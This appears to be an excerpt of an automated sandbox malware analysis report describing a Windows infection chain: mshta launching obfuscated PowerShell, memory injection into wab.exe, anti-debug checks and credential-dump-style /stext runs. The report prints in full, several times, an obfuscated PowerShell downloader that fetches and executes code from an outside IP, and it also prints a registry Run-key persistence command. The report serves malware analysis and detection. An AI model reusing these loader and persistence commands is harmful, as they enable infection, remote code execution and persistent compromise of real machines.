              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_19-34119
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C96ACB GetCPInfo,LdrInitializeThunk,10_2_22C96ACB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C92639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_22C92639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,16_2_004044A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C94AB4 mov eax, dword ptr fs:[00000030h]10_2_22C94AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C9724E GetProcessHeap,10_2_22C9724E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C92639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_22C92639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C92B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_22C92B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_22C960E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3AC0000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 1CFB20
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teSJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teSJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kostplanen = 1;$farvervej='substrin';$farvervej+='g';function bortledede($heksekedlen220){$electrostatic=$heksekedlen220.length-$kostplanen;for($lsehovederne=4; $lsehovederne -lt $electrostatic; $lsehovederne+=(5)){$teaseled+=$heksekedlen220.$farvervej.invoke($lsehovederne, $kostplanen);}$teaseled;}function oraklerne($forpagtnigsafgiftens110){. ($attackman) ($forpagtnigsafgiftens110);}$rheophore=bortledede 'bullm eftotur,zsikkiq.aflb ssl prea rew/udlb5tetr.bill0over quic( ro,wiodiif rgn g.sdlando afgwcykes.agt bracn fl,tbrok pic,1jetm0lagr.megi0sho.; app antiwlaicisygenhymn6f,rr4 unf;.rov alvaxazox6wapa4 del;paca pro.r hydvoutl:u.de1pea.2 sca1.ntr.e.mo0slap)n.nc windg ablecompc untkhor,o ,ei/slre2.rol0 fir1 u,a0pann0bag.1sten0fort1 arm re,f katia acrunreeprp fco,sonaphx cl / an,1bero2inds1trlb.mu k0an.i ';$prologfortolkere=bortledede 'ophru jrsmaage gonrsk b-massapentgun,se retnha rt,nar ';$renprisen=bortledede 'arthhkurdtcy,itramppgabe:hedt/ .ig/ anv8flyt7 hom.extr1 ype2pree1fris.bol 1lovp0post5cott.samm1p,th6 ma 3 dis/ dnsbefouflinbteodua hemsandb,eapisheelforgi,ishcpyntanar lpar . mardskufw lemp pos ';$burgessdom=bortledede 'w,ip>til ';$attackman=bortledede 'reisi,once,agaxr.gi ';$robaades='skjolddragerens';oraklerne (bortledede 'd.sis .pvetec.tcoll-elecc uniobevinm.katl jle p,rnh.sht,rem van,-recupta taovertmassh ,el ro.dtsiou: bru\tschtdesceproglprefee.ptfbarbosemirh,alb odirenons,rid erre rovlfremsomkoe udbndgndssagv.f rstspirxresutlett i os-nonsv v,sa loelsisbufritegain exo$undlrlithodedibstttalocoasol,dresee fowsconv;sogg ');oraklerne (bortledede 'plagifor,f for d.to( opvttaste chrsgrnstmid.- forp eftafas,t,tophartu koittst g:ande\ cysts,are atalaflae.dmof,efiolnovrpantbex,si vi.nlsepdska emalul heas vege fornparas,ore.m.set carxhiertancr) p,e{fogeetranxraadikerntkirk}syn,;kase ');$baetylic = bortledede 'kulte,ondce,saha atotouc nono% stea vilpi tepgly d troat drtli.ga cen%gara\ ,igi fosdhyp.e dasaeighlmandosvrtggesjistu.ccassaar,plpeal1b ef4rive3si.n.pab.cbaudhkla.oforr ter& d,n&a.gl konvevrdicbabbhcomponeoc s ta$ sem ';oraklerne (bortledede '.ype$infegb,atlfl,ko.ucubfritaex.alglo,:s mof ap,rcataothyrg r kmvuggeach,nvars=vare( frecmatempistd and spir/ant.cdigi pach$ f,rbprotashine cy t depyca,rlselvi fagcsucc)mora ');oraklerne (bortledede 'pres$lykngbedaltapeonakebtelpasvvnlraci:morbdsmotit pmscplfpw seouro.n tope skanstyrtflyvetrskn anch .reeformdpappeuplenf ld=st,t$.mlgrmeniemi.enamazp ar,rgr niamphskrydekug.nt,ng. mpsthrip undl secipondtaf k(spat$rre.b kakureflrkonsg .alesi.asfa csberrdslanos,olmisol),iat ');$renprisen=$disponentenheden[0];oraklerne (bortledede 'ma t$cherg spalc.unon.nebprecat.pclstoc:forfslevetfortaprist kriititasforetundei chik bilexer,ro.ersgadm=nonin soreautow,tan-umagomis.bloddj,tole .ufc biltvill reidshotby emos ectuninecocomv.ka.aescnhalvefngstomph.unwiwsu,mes.yrbtetrcslubldrggiju tes
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kostplanen = 1;$farvervej='substrin';$farvervej+='g';function bortledede($heksekedlen220){$electrostatic=$heksekedlen220.length-$kostplanen;for($lsehovederne=4; $lsehovederne -lt $electrostatic; $lsehovederne+=(5)){$teaseled+=$heksekedlen220.$farvervej.invoke($lsehovederne, $kostplanen);}$teaseled;}function oraklerne($forpagtnigsafgiftens110){. ($attackman) ($forpagtnigsafgiftens110);}$rheophore=bortledede 'bullm eftotur,zsikkiq.aflb ssl prea rew/udlb5tetr.bill0over quic( ro,wiodiif rgn g.sdlando afgwcykes.agt bracn fl,tbrok pic,1jetm0lagr.megi0sho.; app antiwlaicisygenhymn6f,rr4 unf;.rov alvaxazox6wapa4 del;paca pro.r hydvoutl:u.de1pea.2 sca1.ntr.e.mo0slap)n.nc windg ablecompc untkhor,o ,ei/slre2.rol0 fir1 u,a0pann0bag.1sten0fort1 arm re,f katia acrunreeprp fco,sonaphx cl / an,1bero2inds1trlb.mu k0an.i ';$prologfortolkere=bortledede 'ophru jrsmaage gonrsk b-massapentgun,se retnha rt,nar ';$renprisen=bortledede 'arthhkurdtcy,itramppgabe:hedt/ .ig/ anv8flyt7 hom.extr1 ype2pree1fris.bol 1lovp0post5cott.samm1p,th6 ma 3 dis/ dnsbefouflinbteodua hemsandb,eapisheelforgi,ishcpyntanar lpar . mardskufw lemp pos ';$burgessdom=bortledede 'w,ip>til ';$attackman=bortledede 'reisi,once,agaxr.gi ';$robaades='skjolddragerens';oraklerne (bortledede 'd.sis .pvetec.tcoll-elecc uniobevinm.katl jle p,rnh.sht,rem van,-recupta taovertmassh ,el ro.dtsiou: bru\tschtdesceproglprefee.ptfbarbosemirh,alb odirenons,rid erre rovlfremsomkoe udbndgndssagv.f rstspirxresutlett i os-nonsv v,sa loelsisbufritegain exo$undlrlithodedibstttalocoasol,dresee fowsconv;sogg ');oraklerne (bortledede 'plagifor,f for d.to( opvttaste chrsgrnstmid.- forp eftafas,t,tophartu koittst g:ande\ cysts,are atalaflae.dmof,efiolnovrpantbex,si vi.nlsepdska emalul heas vege fornparas,ore.m.set carxhiertancr) p,e{fogeetranxraadikerntkirk}syn,;kase ');$baetylic = bortledede 'kulte,ondce,saha atotouc nono% stea vilpi tepgly d troat drtli.ga cen%gara\ ,igi fosdhyp.e dasaeighlmandosvrtggesjistu.ccassaar,plpeal1b ef4rive3si.n.pab.cbaudhkla.oforr ter& d,n&a.gl konvevrdicbabbhcomponeoc s ta$ sem ';oraklerne (bortledede '.ype$infegb,atlfl,ko.ucubfritaex.alglo,:s mof ap,rcataothyrg r kmvuggeach,nvars=vare( frecmatempistd and spir/ant.cdigi pach$ f,rbprotashine cy t depyca,rlselvi fagcsucc)mora ');oraklerne (bortledede 'pres$lykngbedaltapeonakebtelpasvvnlraci:morbdsmotit pmscplfpw seouro.n tope skanstyrtflyvetrskn anch .reeformdpappeuplenf ld=st,t$.mlgrmeniemi.enamazp ar,rgr niamphskrydekug.nt,ng. mpsthrip undl secipondtaf k(spat$rre.b kakureflrkonsg .alesi.asfa csberrdslanos,olmisol),iat ');$renprisen=$disponentenheden[0];oraklerne (bortledede 'ma t$cherg spalc.unon.nebprecat.pclstoc:forfslevetfortaprist kriititasforetundei chik bilexer,ro.ersgadm=nonin soreautow,tan-umagomis.bloddj,tole .ufc biltvill reidshotby emos ectuninecocomv.ka.aescnhalvefngstomph.unwiwsu,mes.yrbtetrcslubldrggiju tes
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kostplanen = 1;$farvervej='substrin';$farvervej+='g';function bortledede($heksekedlen220){$electrostatic=$heksekedlen220.length-$kostplanen;for($lsehovederne=4; $lsehovederne -lt $electrostatic; $lsehovederne+=(5)){$teaseled+=$heksekedlen220.$farvervej.invoke($lsehovederne, $kostplanen);}$teaseled;}function oraklerne($forpagtnigsafgiftens110){. ($attackman) ($forpagtnigsafgiftens110);}$rheophore=bortledede 'bullm eftotur,zsikkiq.aflb ssl prea rew/udlb5tetr.bill0over quic( ro,wiodiif rgn g.sdlando afgwcykes.agt bracn fl,tbrok pic,1jetm0lagr.megi0sho.; app antiwlaicisygenhymn6f,rr4 unf;.rov alvaxazox6wapa4 del;paca pro.r hydvoutl:u.de1pea.2 sca1.ntr.e.mo0slap)n.nc windg ablecompc untkhor,o ,ei/slre2.rol0 fir1 u,a0pann0bag.1sten0fort1 arm re,f katia acrunreeprp fco,sonaphx cl / an,1bero2inds1trlb.mu k0an.i ';$prologfortolkere=bortledede 'ophru jrsmaage gonrsk b-massapentgun,se retnha rt,nar ';$renprisen=bortledede 'arthhkurdtcy,itramppgabe:hedt/ .ig/ anv8flyt7 hom.extr1 ype2pree1fris.bol 1lovp0post5cott.samm1p,th6 ma 3 dis/ dnsbefouflinbteodua hemsandb,eapisheelforgi,ishcpyntanar lpar . mardskufw lemp pos ';$burgessdom=bortledede 'w,ip>til ';$attackman=bortledede 'reisi,once,agaxr.gi ';$robaades='skjolddragerens';oraklerne (bortledede 'd.sis .pvetec.tcoll-elecc uniobevinm.katl jle p,rnh.sht,rem van,-recupta taovertmassh ,el ro.dtsiou: bru\tschtdesceproglprefee.ptfbarbosemirh,alb odirenons,rid erre rovlfremsomkoe udbndgndssagv.f rstspirxresutlett i os-nonsv v,sa loelsisbufritegain exo$undlrlithodedibstttalocoasol,dresee fowsconv;sogg ');oraklerne (bortledede 'plagifor,f for d.to( opvttaste chrsgrnstmid.- forp eftafas,t,tophartu koittst g:ande\ cysts,are atalaflae.dmof,efiolnovrpantbex,si vi.nlsepdska emalul heas vege fornparas,ore.m.set carxhiertancr) p,e{fogeetranxraadikerntkirk}syn,;kase ');$baetylic = bortledede 'kulte,ondce,saha atotouc nono% stea vilpi tepgly d troat drtli.ga cen%gara\ ,igi fosdhyp.e dasaeighlmandosvrtggesjistu.ccassaar,plpeal1b ef4rive3si.n.pab.cbaudhkla.oforr ter& d,n&a.gl konvevrdicbabbhcomponeoc s ta$ sem ';oraklerne (bortledede '.ype$infegb,atlfl,ko.ucubfritaex.alglo,:s mof ap,rcataothyrg r kmvuggeach,nvars=vare( frecmatempistd and spir/ant.cdigi pach$ f,rbprotashine cy t depyca,rlselvi fagcsucc)mora ');oraklerne (bortledede 'pres$lykngbedaltapeonakebtelpasvvnlraci:morbdsmotit pmscplfpw seouro.n tope skanstyrtflyvetrskn anch .reeformdpappeuplenf ld=st,t$.mlgrmeniemi.enamazp ar,rgr niamphskrydekug.nt,ng. mpsthrip undl secipondtaf k(spat$rre.b kakureflrkonsg .alesi.asfa csberrdslanos,olmisol),iat ');$renprisen=$disponentenheden[0];oraklerne (bortledede 'ma t$cherg spalc.unon.nebprecat.pclstoc:forfslevetfortaprist kriititasforetundei chik bilexer,ro.ersgadm=nonin soreautow,tan-umagomis.bloddj,tole .ufc biltvill reidshotby emos ectuninecocomv.ka.aescnhalvefngstomph.unwiwsu,mes.yrbtetrcslubldrggiju tesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$kostplanen = 1;$farvervej='substrin';$farvervej+='g';function bortledede($heksekedlen220){$electrostatic=$heksekedlen220.length-$kostplanen;for($lsehovederne=4; $lsehovederne -lt $electrostatic; $lsehovederne+=(5)){$teaseled+=$heksekedlen220.$farvervej.invoke($lsehovederne, $kostplanen);}$teaseled;}function oraklerne($forpagtnigsafgiftens110){. ($attackman) ($forpagtnigsafgiftens110);}$rheophore=bortledede 'bullm eftotur,zsikkiq.aflb ssl prea rew/udlb5tetr.bill0over quic( ro,wiodiif rgn g.sdlando afgwcykes.agt bracn fl,tbrok pic,1jetm0lagr.megi0sho.; app antiwlaicisygenhymn6f,rr4 unf;.rov alvaxazox6wapa4 del;paca pro.r hydvoutl:u.de1pea.2 sca1.ntr.e.mo0slap)n.nc windg ablecompc untkhor,o ,ei/slre2.rol0 fir1 u,a0pann0bag.1sten0fort1 arm re,f katia acrunreeprp fco,sonaphx cl / an,1bero2inds1trlb.mu k0an.i ';$prologfortolkere=bortledede 'ophru jrsmaage gonrsk b-massapentgun,se retnha rt,nar ';$renprisen=bortledede 'arthhkurdtcy,itramppgabe:hedt/ .ig/ anv8flyt7 hom.extr1 ype2pree1fris.bol 1lovp0post5cott.samm1p,th6 ma 3 dis/ dnsbefouflinbteodua hemsandb,eapisheelforgi,ishcpyntanar lpar . mardskufw lemp pos ';$burgessdom=bortledede 'w,ip>til ';$attackman=bortledede 'reisi,once,agaxr.gi ';$robaades='skjolddragerens';oraklerne (bortledede 'd.sis .pvetec.tcoll-elecc uniobevinm.katl jle p,rnh.sht,rem van,-recupta taovertmassh ,el ro.dtsiou: bru\tschtdesceproglprefee.ptfbarbosemirh,alb odirenons,rid erre rovlfremsomkoe udbndgndssagv.f rstspirxresutlett i os-nonsv v,sa loelsisbufritegain exo$undlrlithodedibstttalocoasol,dresee fowsconv;sogg ');oraklerne (bortledede 'plagifor,f for d.to( opvttaste chrsgrnstmid.- forp eftafas,t,tophartu koittst g:ande\ cysts,are atalaflae.dmof,efiolnovrpantbex,si vi.nlsepdska emalul heas vege fornparas,ore.m.set carxhiertancr) p,e{fogeetranxraadikerntkirk}syn,;kase ');$baetylic = bortledede 'kulte,ondce,saha atotouc nono% stea vilpi tepgly d troat drtli.ga cen%gara\ ,igi fosdhyp.e dasaeighlmandosvrtggesjistu.ccassaar,plpeal1b ef4rive3si.n.pab.cbaudhkla.oforr ter& d,n&a.gl konvevrdicbabbhcomponeoc s ta$ sem ';oraklerne (bortledede '.ype$infegb,atlfl,ko.ucubfritaex.alglo,:s mof ap,rcataothyrg r kmvuggeach,nvars=vare( frecmatempistd and spir/ant.cdigi pach$ f,rbprotashine cy t depyca,rlselvi fagcsucc)mora ');oraklerne (bortledede 'pres$lykngbedaltapeonakebtelpasvvnlraci:morbdsmotit pmscplfpw seouro.n tope skanstyrtflyvetrskn anch .reeformdpappeuplenf ld=st,t$.mlgrmeniemi.enamazp ar,rgr niamphskrydekug.nt,ng. mpsthrip undl secipondtaf k(spat$rre.b kakureflrkonsg .alesi.asfa csberrdslanos,olmisol),iat ');$renprisen=$disponentenheden[0];oraklerne (bortledede 'ma t$cherg spalc.unon.nebprecat.pclstoc:forfslevetfortaprist kriititasforetundei chik bilexer,ro.ersgadm=nonin soreautow,tan-umagomis.bloddj,tole .ufc biltvill reidshotby emos ectuninecocomv.ka.aescnhalvefngstomph.unwiwsu,mes.yrbtetrcslubldrggiju tesJump to behavior
              Source: wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*YG
